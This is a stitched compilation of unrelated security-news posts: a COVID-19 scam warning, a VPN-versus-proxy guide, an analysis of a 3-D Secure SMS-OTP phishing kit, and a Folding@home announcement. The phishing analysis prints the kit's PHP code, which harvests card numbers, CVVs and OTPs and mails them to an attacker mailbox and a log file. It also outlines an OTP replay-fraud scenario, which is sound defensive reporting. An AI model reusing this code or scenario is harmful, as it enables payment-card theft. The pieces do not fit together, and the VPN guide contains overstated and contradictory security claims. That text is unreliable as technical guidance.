Individuals should not fear receiving packages from China, the WHO said, as the virus cannot survive long durations on physical objects like packages and letters. Similarly, individuals should not dip into unmeasured fear of all things Chinese. These fears have turned New York’s Chinatown district into a “ghost town,” said one local business owner, and have fueled multiple xenophobic and racist assumptions across the world.
The WHO says it is okay to receive packages delivered from China.

Coronavirus has also received a strong global response. Air travel has been severely limited, Olympic qualifying games were relocated, workers built a hospital in about 10 days, fast food restaurants temporarily closed their locations, and China closed off entire populations—which has come with its own tragic tales of quarantine camps, isolation, and fear.

The spread of the virus is scary, yes, but people are working day and night to prevent greater exposure.
What should I know about coronavirus scams?

Coronavirus online scams are largely similar to one another. By preying on misinformation and fear, cybercriminals hope to trick unwitting individuals into opening files and documents that promise information about the virus.

However, Malwarebytes recently found an email scam that preys on people’s desire to help during a moment like this.

The scam email—titled “URGENT: Coronavirus, Can we count on your support today?”—purportedly comes from the nondescript “Department of Health.” Inside, the email asks users to donate to coronavirus prevention causes.

“We need your support , Would you consider donating 100 HKD to help us achieve our mission?” the email says near its end, before offering a disguised link that opens an application, not a website. The link itself begins with neither HTTPS nor HTTP, but “HXXP.”
A screenshot of an emailed coronavirus scam that preys on users’ good will.

Routine scams that allegedly include information about prevention and protection also come through emails, like this phishing scam spotted by Sophos.
A screenshot of the emailed coronavirus scam that Sophos discovered.

The malicious email informs its recipient to open an attached document that includes information about “safety measures regarding the spreading of coronavirus,” which then directs users to a page that asks for their email address and password.

These scams are becoming a dime a dozen, and we don’t expect them to dwindle any time soon. In fact, threat actors in China were spotted sending malware around through email and through the Chinese social media platform WeChat. Though the exact types of malware were not reported, the Computer Virus Emergency Response Center said the malware itself could be used to steal data or remotely control victims’ devices.
Coronavirus information and data resources

If you’re afraid about the spread of coronavirus, we understand. But please, do not click any links in any sketchy emails, and do not donate to any causes you have not already vetted outside of your email client.

If you want to know up-to-the-date information about the virus, again, please visit the following resources:
The World Health Organization’s main information page on the virus
The WHO’s daily “situation reports”
The WHO’s “Mythbusters” page
The WHO’s public advice guide
The Center for Disease Control and Prevention’s main information page on the virus

Stay safe, everyone.

What is the Difference Between VPN and Proxy – A Complete Guide!!!


By Balaji N - February 9, 2020     Cyber Security News



Both VPNs and proxies sit between the client and the server and hide the client’s IP address, but they differ in how they handle the data in transit.

In the modern cyber world we face many concerns about our privacy, and both VPNs and proxies address it to a significant degree.

It is important to understand the difference between a VPN and a proxy, and the scenarios where each can and cannot be used.
What is a Proxy?

A proxy, or proxy server, is an intermediate node between the client and the internet: it takes a request from the client, passes it on to the relevant server, and so provides indirect network services to the client. The primary purpose of a proxy is to filter dangerous internet traffic by applying strict rules and to provide anonymity for the client.

It lets us hide the client’s IP address and location from the sites they visit. The client connects to one of the proxy servers, the request is forwarded to the proxy, the proxy processes it, and the result is returned to the client.

What is a VPN?

A VPN, or Virtual Private Network, is a technology developed to provide secure access over the internet by carrying the client’s requests through encrypted tunnels. A VPN redirects the client-side request via a remote server run by the VPN service provider. It helps ensure that sensitive data remains private while it is transmitted over the internet from one place to another.

A VPN shields the user’s browsing activity and bypasses internet censorship. The VPN software encrypts the user’s request before the Internet Service Provider can see it; the request is redirected through the VPN node and the response is returned to the client.

Proxy vs VPN Security

When it comes to security, VPNs stand ahead of proxy servers: a VPN has an encrypted tunnel to transfer the data securely, which is not the case with a proxy.
Virtual Private Network (VPN) Security

With a VPN you get a unique IP address and a secure tunnel established between you and the target you are connecting to.

The VPN’s encrypted tunnel carries traffic routed over all internet protocols, with sophisticated privacy and security capabilities.

VPNs are well known for security and reliability, and it is easy for anyone to switch the VPN service on or off.

Because of the encrypted tunnel, a VPN secures your data from hackers even when you are connected to an open Wi-Fi hotspot.

VPN applications are available for a number of platforms: PlayStation, smart TVs, OS X, iPhone, Windows, and Android, as well as other devices such as Apple TV, Chromecast, Roku, and Xbox, and network devices too.

With AES-256 encryption and SSL certificates, there is no chance for an attacker to get at your data, and even government authorities can’t get your data. To construct the tunnel it uses tunneling protocols such as PPTP, L2TP, SSTP, and OpenVPN.

It helps hide your real location, and lets you securely reach websites, videos, and other content that is blocked in your location.
Proxy Security

Proxy servers bridge the internet connection: they only mask your computer’s IP address and do not encrypt the contents.

They communicate using the HTTP or SOCKS protocol, so there is no encryption with proxy servers, and cybercriminals can sniff the data travelling through a proxy server.

In some cases cybercriminals even advertise a proxy server in order to steal your identity. Also, proxy servers are generally overloaded with visitors, which badly affects the connection speed.

HTTP proxies are more familiar and have been around for a long time, while Socket Secure (SOCKS5) proxies are used for connecting to torrent services, FTP, and web servers. Compared to a regular proxy, SOCKS5 has improved security.

A SOCKS5 proxy is very good if you are using a torrent or P2P service, but it lacks privacy. If you do a lot of web surfing and simply want to get past websites blocked geographically or by a firewall, then proxy servers are ideal for you.
Proxy vs VPN Speed
Speed is one of the most important concerns when accessing the internet through a proxy or a VPN. When we talk about speed, the proxy server is always faster than the VPN.
Proxy vs. VPN Cost
Multiple cities and subnets, minimum downtime, an API-accessible proxy list, and the uplink speed of all proxy servers.
Paid proxies contain many servers that allow users to choose any server in the available countries. Free proxies, by contrast, are limited, give low bandwidth, and slow down access.
Plan to spend anywhere from $5 a month for basic plans; the price also depends on the quality of the proxies and the providers.
VPN and Proxy Usability
A proxy server provides an additional layer of security between the endpoint and outside traffic, and is mainly used to improve corporate and institutional security.
A VPN encrypts all the traffic flowing between the internet and your device, to prevent the ISP from monitoring your activities and collecting your browsing data.
Proxies play a major role in anonymizing web traffic, adding identity protection for corporate officers, reporters, and whistleblowers.
A VPN also provides high-level anonymity and encrypts the user’s request, which passes through various remote servers, making it impossible to track back to you.
Organizations run their internal networks through a proxy server to control internet usage and prevent access to inappropriate sites from the internal network.
A VPN bypasses internet censorship, lets you access anything you want on the internet, and hides your activities from government and law enforcement agencies.
Proxy servers provide strong protection from hackers while using public Wi-Fi, and get past censored websites.
VPNs are slower because of the encryption, while proxy servers are faster, since proxies do not encrypt the traffic between the internet and the user’s device.
A VPN lets you access the corporate network securely from an outside internet connection such as a hotel or coffee shop.
If you don’t have a corporate VPN, proxies provide an alternative with high security, and the client software is very easy to use.
A VPN provides a high-security feature for accessing secure apps and desktop/laptop programs, whereas proxies are not well suited to this case.
Proxies don’t use any tunneling, but a proxy server is a great way to add a layer between your enterprise and the internet.
A VPN provides tunneled connections: when data is sent privately over the internet, the packet gets a layer of security that guards the contents against general visibility.
VPNs are best for…

VPNs secure your data from prying eyes; everyone from hackers to government officials uses VPN services to protect personal data. A VPN enables users to send and receive data and remain anonymous on the internet.

Most VPNs offer multiple concurrent connections so that users can connect all the devices in the household to the VPN.

With a VPN all your traffic passes through a tunnel, so even the ISP cannot see the traffic that goes through the tunnel.

If you are an employee, you can connect to your office network securely via smartphone, tablet, and computer through a VPN.
A VPN is best for protecting valuable information online.
It enables you to shop online safely with credit cards.
It enables you to browse safely on public Wi-Fi hotspots.
With a VPN you can reach your favorite movie sites even when they are blocked in your country.
With a VPN, users can bypass web censorship and content surveillance.
A VPN enables you to establish communication between sites securely.
Some VPN providers offer ad blockers as well.
It protects you while logged in to torrent sites.
With a VPN in place, you can access websites that are blocked geographically.
VPNs provide integrity, which ensures the packet is not altered while in transit.
A VPN’s anonymization allows peer-to-peer file sharing, which is blocked in many countries.

Technically speaking, a VPN is a wide area network that retains the functionality and security of a private network. These are the main uses of a VPN; actual usage varies with the user’s requirements.
VPNs are not for…
VPNs may slow down the internet connection

You may experience a drop in speed when your internet connection is routed through a VPN, due to its high-quality 256-bit encryption. Sometimes a VPN connection slows down the internet speed if too many users are active on the server.

Generally, VPN speed depends on your internet speed; if you are in India and using a VPN server in the USA, your connection is tunneled over a number of endpoints, which may slow it down. So users are advised to choose their VPN server wisely.
I’m under a VPN, so I can do anything online

If you are on a VPN we can’t say you are 100% anonymous: the VPN provider can see your access logs, and they may hold the logs for a period of at least 6 months, depending on the country.

Not all VPNs are the same; there are a number of factors to consider in classifying them: need, supported platforms, and the number of available servers.

Also, users should be aware that a VPN will not secure you from phishing or from malware and ransomware attacks.

You can get a free VPN, but the connection would be terrible, it suffers severely from low-bandwidth limitations, and some providers even sell your private data.
Proxies are best for…

Proxies are widely used to bypass websites blocked at the ISP or organization level.

Proxy servers are used in corporate environments to shield the internal network infrastructure.

Proxies contain a very good cache mechanism, so they can be used to speed up browsing.

A proxy hides your original IP address and shows a spoofed IP address, so the destination website cannot read your original IP.

A proxy keeps you anonymous online, but it will not encrypt the traffic the way a VPN does.

With some proxies you get double protection, as they have a built-in firewall that stops intrusions.

Server administrators can use proxy servers to block websites associated with social networking, gaming, and adult content for employees in the organization.

There are thousands of free and paid proxies available on the internet; when choosing a proxy you should carefully consider its downtime.

With the help of proxy servers, one can reach websites that have been blocked geographically.

Implementing a proxy is very simple, and proxies integrate closely with browsers. Some premium proxies can save companies bandwidth.
Proxies are not for…

Proxy servers are not secure for email communication or file transfer protocols; they are good only for web communication.

It is less secure than storing all the user passwords in Active Directory, and they are not compatible with all network protocols.

With proxy firewalls, configuration is very difficult compared to other modern firewalls.

If the proxy server is compromised there is a chance of identity theft, so you should avoid entering bank login credentials when connected through a proxy server.

The proxy server administrator can sniff all the details travelling through the server, and proxies are also poor at handling things such as Flash, Java, and JavaScript.

Proxy servers have some serious security disadvantages: if a single port is left open on the proxy server, attackers can enumerate it.

If there is an issue establishing a connection, it is hard to troubleshoot with a proxy server, and proxies are not compatible with all network protocols.

We already discussed that the cache increases speed, but on the other hand there are some disadvantages: the cache can serve stale, outdated content.

Not all proxies are good; you should spend a lot of time finding the right proxy. Only a good proxy chain provides better performance.
Conclusion

Simply put, both proxies and VPNs were made to hide internet traffic; with a VPN the traffic passes through a network tunnel, but low-quality VPNs would expose you to serious threats.

Proxy servers are very hard to set up and they won’t encrypt the data, and using a VPN or proxy can slow down the connection dramatically. When it comes to encryption, VPNs are the best and they offer encryption with industry-standard key sizes.

One should be very careful in picking a proxy server, because attackers also run proxy servers to sniff network traffic.

With a proxy you can hide only the HTTP traffic, but with a VPN you can hide the traffic sent through all protocols.

If you compare VPN and proxy to decide which is better, it completely depends on your requirement. It doesn’t matter whether you pick a proxy server or a VPN, but you need to ensure the service you select solves your requirement.

Monday, March 9, 2020

3-D Secure SMS-OTP Phishing



One of our remediation analysts Eli Trevino recently discovered a phishing page informing victims about fake Netflix service disruptions, supposedly due to problems with the victim’s payment method.

The phishing page prompts victims to provide their payment details to prevent account lockout:



What’s interesting about this phishing page is that it selectively targets victims within a specific geographic region: France. The attackers use French for the page content, and the country calling code defaults to 33, which is designated for calls to France.
3-D Secure

The phishing campaign is specifically targeting payment cards using the 3-D Secure system, which was created by the largest payment card companies to combat online fraudulent CNP (card not present) transactions.

The latest iteration, 3-D Secure 2.0, now requires the use of a dynamic SMS OTP (one-time password) which is sent to the card owner’s registered mobile number. This SMS OTP used by banks for authenticating online purchases is also referred to as a mobile transaction authentication number (mTAN).

Before this functionality was implemented, card owners would have to use the static PIN code that was assigned to them during the card’s activation — but these static PIN codes were vulnerable to theft and made it easy for attackers to authenticate, once the static PIN code was known.

3-D Secure 2.0 uses an SMS OTP so that users don’t need to remember or store passcodes as they previously did with the static PIN. Instead, they just need access to their mobile SIM card to receive the OTP via SMS.

This SMS OTP feature forces thieves to find a way to acquire or bypass the OTP passcode, so they can fraudulently use the stolen payment card data. To accomplish this, the attackers have included a second step in their phishing campaign which prompts the victim to submit their SMS OTP passcode.



Once a victim has submitted all of their information and authenticated the OTP, the payment data is sent to an email address controlled by the attacker. It is also logged to a specified .txt file on the compromised website hosting the phishing page. Victims are simply redirected to the homepage of Netflix after they press the Confirmer button on the final step.
-------------------------------------------------------------------------------
session_start();
$ip = getenv("REMOTE_ADDR");
$hostname = gethostbyaddr($ip);
// message body assembled from the phished form fields (card data, OTPs, contact details)
$bilsmg .= "sms 2 : ".$_POST['otp']."\n";
$bilsmg .= "sms 1 : ".$_POST['sms1']."\n";
$bilsmg .= "------------------------------------------------------\n";
$bilsmg .= "N-Phone : ".$_POST['tel']."\n";
$bilsmg .= "E-mail : ".$_POST['email']."\n";
$bilsmg .= "C-Number : ".$_POST['cc']."\n";
$bilsmg .= "D-Expiration : ".$_POST['expe']."\n";
$bilsmg .= "CVN : ".$_POST['cvv']."\n";
$bilsmg .= "--------------------------------------------------------\n";
$bilsmg .= "From : $ip \n";
$bilsub = "Full Infos sms2 - ".$ip;
$bilhead = "From: [redacted] <Amret@localhost.ma>";
// exfiltration channel 1: e-mail to the attacker-controlled mailbox
mail("spampassitusaispas@protonmail.ch",$bilsub,$bilsmg,$bilhead);
// exfiltration channel 2: appended to a .txt log on the compromised host
$file = fopen("../CC-720088888803.txt", 'a');
fwrite($file, $bilsmg);
// victim is finally sent to the real Netflix homepage
header("location: https://www.netflix.com/");
-------------------------------------------------------------------------------
Problems with Specific ACS Implementations of OTP over SMS

I was initially confused ― I didn’t understand how the attackers were planning on using the stolen OTP and payment card data. I thought the generated SMS with the OTP would be limited to the single transaction and merchant making the request to the 3DS Access Control Server.

Then, I came across this post, which confirmed that the SMS OTP process is not necessarily standardized across 3DS ACS providers. Moreover, the post referenced a serious issue that could be abused by attackers for specific 3DS ACS providers with these characteristics:
The SMS OTP is generated from the payment card number only, not from other inputs like the merchant ID
The generated SMS OTP remains valid for 180 seconds (time)
OTP Replay Attack Scenario

These characteristics allow an attacker to perform an OTP replay attack. A typical scenario might follow steps along these lines:
Victim receives fraudulent phishing email regarding a popular service like Netflix or Spotify being limited due to a payment issue.
Victim loads the phishing page requesting their information and payment data and submits the information to the attacker. The phishing page informs the victim that a SMS containing a passcode will arrive soon.
During this time, the attacker’s tools use the submitted payment and personal information to immediately initiate a transaction with the merchant brand used in the phishing campaign (e.g. Netflix).
The initiated transaction causes an SMS with the 3DS OTP passcode to be sent to the victim’s phone. The victim submits the OTP passcode to the phishing page and is eventually redirected to the impersonated brand (e.g. Netflix).
The attacker now has a limited window of time to reuse the SMS OTP passcode and make a fraudulent purchase with the phished payment card data. The SMS OTP is considered already authenticated, so it won’t matter whether the merchant and/or transaction price is the same as in the initial transaction.
A generated .txt file within the phishing kit that contains the phished details
The Problem: OTP Generation from Payment Card Numbers

The main problem here is that the SMS OTP is not being uniquely generated for each transaction. Instead, it is generated from the payment card’s number, allowing this window where the stolen payment card data can be reused at another merchant defined by the attacker.
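To make the difference concrete, here is an added toy model (not code from the post or from any real ACS product) of the verification policy described in the scenario above and in the paragraph just before this. The `Acs` class, the merchant names, the test PAN and the amounts are all constructed; the weak mode accepts a still-valid OTP for any merchant and amount, while the hardened mode binds the OTP to the transaction that triggered it and makes it single-use.

```python
import secrets

OTP_TTL_SECONDS = 180  # validity window cited in the post


class Acs:
    """Toy model of a 3DS Access Control Server that issues SMS OTPs.

    Constructed for illustration; it does not model any real ACS product.
    bind_to_transaction=False reproduces the weak behaviour described above:
    the OTP is tied to the card number only and stays valid for the full TTL,
    so the same code is accepted again for a different merchant and amount.
    bind_to_transaction=True is the hardened variant: the OTP is bound to the
    merchant and amount of the transaction that triggered it and is single-use.
    """

    def __init__(self, bind_to_transaction):
        self._bind = bind_to_transaction
        self._challenges = {}  # (pan, otp) -> challenge record

    def start_challenge(self, pan, merchant_id, amount, now):
        """Merchant starts 3DS authentication for `pan`; returns the 6-digit
        OTP the issuer would send to the cardholder by SMS."""
        otp = f"{secrets.randbelow(1_000_000):06d}"
        self._challenges[(pan, otp)] = {
            "merchant_id": merchant_id,
            "amount": amount,
            "expires_at": now + OTP_TTL_SECONDS,
            "used": False,
        }
        return otp

    def verify(self, pan, merchant_id, amount, otp, now):
        """Merchant submits the OTP typed by the cardholder. Returns True if
        this ACS would mark the transaction as authenticated."""
        rec = self._challenges.get((pan, otp))
        if rec is None or now > rec["expires_at"]:
            return False  # unknown code, or outside the 180 s window
        if not self._bind:
            return True  # weak ACS: any merchant, any amount, any number of times
        if rec["used"]:
            return False  # hardened: each OTP authenticates exactly one transaction
        if rec["merchant_id"] != merchant_id or rec["amount"] != amount:
            return False  # hardened: this OTP belongs to a different transaction
        rec["used"] = True
        return True


def replay_scenario(acs, now=1_000_000.0):
    """Walks through the post's steps with constructed values: a transaction is
    started at the impersonated brand, the cardholder receives the OTP, and the
    same OTP is then presented for a different merchant and amount inside the
    180 s window. Returns (first_auth_ok, second_auth_ok)."""
    pan = "4111111111111111"  # well-known test PAN, not a real card
    otp = acs.start_challenge(pan, "netflix", "11.99", now)
    first = acs.verify(pan, "netflix", "11.99", otp, now + 30)
    second = acs.verify(pan, "other-merchant", "499.00", otp, now + 90)
    return first, second


def expiry_scenario(acs, now=1_000_000.0):
    """Even the weak ACS rejects the OTP once the 180 s window has elapsed."""
    pan = "4111111111111111"  # constructed test PAN
    otp = acs.start_challenge(pan, "netflix", "11.99", now)
    return acs.verify(pan, "netflix", "11.99", otp, now + OTP_TTL_SECONDS + 1)


if __name__ == "__main__":
    print("weak ACS     (first, second):", replay_scenario(Acs(bind_to_transaction=False)))
    print("hardened ACS (first, second):", replay_scenario(Acs(bind_to_transaction=True)))
```

The weak model returns `(True, True)`, i.e. the second use succeeds within the window; the hardened model returns `(True, False)`, and both reject the code after 180 seconds.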

Website owners can detect phishing pages and other malware with a file monitoring service, like our server side scanner, which regularly detects changes made to your website files.

Folding@Home Wants Your CPU Cycles for Coronavirus Research



By Lawrence Abrams BleepingComputer.com

March 9, 2020 01:36 PM






The Folding@home distributed computing project is now utilizing donated CPU cycles to research the Coronavirus (COVID-19) virus.

Folding@home is a project founded by Pande Lab at Stanford University where users donate CPU cycles through a software client to simulate protein folding, computational drug design, and other types of molecular dynamics to learn more about diseases and how to protect against them.

At the end of February, the Folding@home project announced that they are joining other COVID-19 researchers around the world to learn more about the virus and create potential drug therapies.

"By downloading Folding@Home, you can donate your unused computational resources to the Folding@home Consortium, where researchers working to advance our understanding of the structures of potential drug targets for 2019-nCoV that could aid in the design of new therapies. The data you help us generate will be quickly and openly disseminated as part of an open science collaboration of multiple laboratories around the world, giving researchers new tools that may unlock new opportunities for developing lifesaving drugs," the Folding@home project stated in a blog post.

If you have a computer lying around not doing anything, or want to donate your active computer's idle CPU processing power to researching the COVID-19 virus, you can do so by downloading and installing the Folding@home client.

Once installed, right-click on the Folding@home icon in your Windows system tray to configure how much CPU power you wish to donate. The intensity of your CPU utilization can be set to 'Full', 'Medium', or 'Light', with Light being the lightest CPU load.
Folding@home options

If you plan on using your computer while donating cycles, I recommend you select the 'Light' option.

If you want to control Folding@home using a web interface, you can select the 'Web Control' option as shown in the image above. This will open a web page showing your current work in progress, your settings, and the project you are contributing your CPU cycles to.
Folding@Home

If you are configured to support research fighting 'Any Disease', then your CPU cycles will be randomly assigned among different projects, including Coronavirus/COVID-19 research.

You can determine what project you are contributing to by looking at the project number and looking it up here.

If you are contributing to projects 11741, 11742, or 11743 then your donated CPU cycles are being used for Coronavirus research.

H/T Rob Joyce